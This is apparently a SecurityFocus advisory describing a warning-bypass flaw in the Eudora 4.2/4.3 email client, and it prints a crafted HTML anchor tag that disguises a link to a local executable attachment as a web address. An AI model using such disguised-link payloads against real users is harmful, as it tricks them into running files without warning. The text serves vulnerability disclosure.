Eudora 4.2/4.3 Warning Message Circumvention Vulnerability

Inserting the tag
<a &nbsp;href="file:///c:/eudora/attach/file.lnk"\>http&nbsp;://www.example.com</&nbsp;a>
in an email message will display as:
http&nbsp;://www.example.com
in a Eudora email client.

Therefore, when a user clicks on this link, it will automatically open up the executable file without warning.

Bennett Haselton <bennett@peacefire.org> has set up the following demonstration page:

http://www.peacefire.org/security/stealthattach/


 

Privacy Statement
Copyright 2010, SecurityFocus